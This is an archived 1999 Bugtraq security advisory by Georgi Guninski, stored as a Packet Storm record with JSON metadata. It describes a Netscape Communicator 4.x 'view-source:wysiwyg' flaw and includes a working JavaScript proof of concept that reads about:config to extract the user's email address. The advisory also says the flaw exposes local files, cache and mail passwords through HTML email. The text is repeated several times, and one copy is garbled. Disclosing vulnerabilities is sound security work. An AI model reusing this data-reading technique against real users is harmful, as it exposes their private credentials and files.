ID PACKETSTORM:11814 Type packetstorm Reporter Georgi Guninski Modified 1999-08-17T00:00:00
Description
`Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator "view-source:" security vulnerabilities
There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
Netscape is notified about the problem.
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
[ Part 2: "Attached Text" ]
[ The following text is in the "koi8-r" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
allows reading the whole parsed document.
Vulnerabilites:
_________________________________________________________________________________________________________________________________
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
_________________________________________________________________________________________________________________________________
Workaround: Disable JavaScript
_________________________________________________________________________________________________________________________________
This demonstration tries to find your email address, it may take some time.
Written by Georgi Guninski
_________________________________________________________________________________________________________________________________
s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \";
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"
" +"for(i=0;i'"; //a=window.open(s); location=s;
-----------------------------------------------------------------------------------------------------
<http://www.nat.bg/~joro/viewsource.html>
<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
`
{"hash": "73275b9191b7f96acbdc423307882fcdd7a847f727258883786513b6b149bfdc", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/11814/netscape.view.source.javascript.txt.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d6156a05874ce642ee5d843e6e83b31e"}, {"key": "modified", "hash": "9c9724194c79e3f95cb8597d199abea6"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9c9724194c79e3f95cb8597d199abea6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "47ec953578a0b6f02f7b5667c9949e91"}, {"key": "sourceData", "hash": "4d3db0712432fec97fc7c4724db2c466"}, {"key": "sourceHref", "hash": "d03890824fd553e7df927fd6596125e2"}, {"key": "title", "hash": "c071df013db907ca387a041c3968cf9b"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "1999-08-17T00:00:00", "modified": "1999-08-17T00:00:00", "title": "netscape.view.source.javascript.txt", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/11814/netscape.view.source.javascript.txt", "history": [], "reporter": "Georgi Guninski", "lastseen": "2016-11-03T10:28:39", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "sourceData": "`Date: Tue, 1 Jun 1999 19:08:49 +0300 \nFrom: Georgi Guninski <joro@NAT.BG> \nTo: BUGTRAQ@netspace.org \nSubject: Netscape Communicator \"view-source:\" security vulnerabilities \n \nThere is a security vulnerability in Netscape Communicator 4.6 Win95, \n4.07 Linux (probably all 4.x versions) in the way \nit works with \"view-source:wysiwyg://1/javascript\" URLs. It parses them \nin a \"view-source\" window. \nThe problem is that it allows access to documents included in the parent \ndocument via \nILAYER SRC=\"view-source:wysiwyg://1/\" using find(). That allows reading \nthe whole parsed document. \n \nVulnerabilites: \n \nBrowsing local directories \nReading user's cache \nReading parsed HTML files \nReading Netscape's configuration (\"about:config\") including user's \nemail address, mail servers and password. \nProbably others \n \nThis vulnerability may be exploited by using HTML email message. \n \nWorkaround: Disable JavaScript \nNetscape is notified about the problem. \n \nDemonstration is available at: http://www.nat.bg/~joro/viewsource.html \n \nRegards, \nGeorgi Guninski \nhttp://www.nat.bg/~joro \nhttp://www.whitehats.com/guninski \n[ Part 2: \"Attached Text\" ] \n \n[ The following text is in the \"koi8-r\" character set. ] \n[ Your display is set for the \"US-ASCII\" character set. ] \n[ Some characters may be displayed incorrectly. ] \n \nThere is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it \nworks with \"view-source:wysiwyg://1/javascript\" URLs. It parses them in a \"view-source\" window. The problem is that it \nallows access to documents included in the parent document via ILAYER SRC=\"view-source:wysiwyg://1/\" using find(). That \nallows reading the whole parsed document. \nVulnerabilites: \n \n_________________________________________________________________________________________________________________________________ \n \nBrowsing local directories \nReading user's cache \nReading parsed HTML files \nReading Netscape's configuration (\"about:config\") including user's email address, mail servers and password. \nProbably others \n \nThis vulnerability may be exploited by using HTML email message. \n \n_________________________________________________________________________________________________________________________________ \n \nWorkaround: Disable JavaScript \n \n_________________________________________________________________________________________________________________________________ \n \nThis demonstration tries to find your email address, it may take some time. \n \nWritten by Georgi Guninski \n \n_________________________________________________________________________________________________________________________________ \n \ns=\"view-source:wysiwyg://1/javascript:s='vvvv>&>\"\" +\"\" +\" blur();msg1=\\\"Your email is: \\\"; \nmend=\\\"general.\\\"+\\\"title_tips\\\";mag=\\\"mail.identity.useremail\\\"+\\\" = \\\";sp=\\\" \\\";res=mag;charstoread=50;\" +\"setTimeout(\\\" \n\" +\"for(i=0;i'\"; //a=window.open(s); location=s; \n \n \n----------------------------------------------------------------------------------------------------- \n \n<http://www.nat.bg/~joro/viewsource.html> \n \n<HTML> \n<BODY> \nThere is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way \nit works with \"view-source:wysiwyg://1/javascript\" URLs. It parses them in a \"view-source\" window. \nThe problem is that it allows access to documents included in the parent document via \nILAYER SRC=\"view-source:wysiwyg://1/\" using find(). That allows reading the whole parsed document. \n<BR> \nVulnerabilites: \n<HR> \nBrowsing local directories<BR> \nReading user's cache<BR> \nReading parsed HTML files<BR> \nReading Netscape's configuration (\"about:config\") including user's email address, mail servers and password.<BR> \nProbably others<BR> \n<BR> \nThis vulnerability may be exploited by using HTML email message. \n<HR> \nWorkaround: Disable JavaScript \n<HR> \nThis demonstration tries to find your email address, it may take some time. \n<BR><BR> \n<A HREF=\"http://www.nat.bg/~joro\">Written by Georgi Guninski</A> \n<HR> \n<SCRIPT> \n \ns=\"view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>\" \n+\"<ILAYER SRC=\\\"view-source:wysiwyg://1/about:config\\\"></ILAYER>\" \n+\" <SCRIPT>blur();msg1=\\\"Your email is: \\\"; mend=\\\"general.\\\"+\\\"title_tips\\\";mag=\\\"mail.identity.useremail\\\"+\\\" = \\\";sp=\\\" \\\";res=mag;charstoread=50;\" \n+\"setTimeout(\\\" \" \n+\"for(i=0;i<charstoread;i++) {\" \n+\" t=res;\" \n+\" find(mend);\" \n+\" for(c=1;c<256;c++) {\" \n+\" t=res + String.fromCharCode(c);\" \n+\" if (find(t,true,true)) {\" \n+\" res=t;\" \n+\" if (c==32) i=charstoread+1\" \n+\" } \" \n+\" }\" \n+\"}\" \n+\"res=res.substring(mag.length);\" \n+\"alert(msg1 + res);\" \n+\" ;\\\",3000);</\"+\"SCRIPT>'\"; \n//a=window.open(s); \nlocation=s; \n \n \n</SCRIPT> \n \n`\n", "id": "PACKETSTORM:11814"}
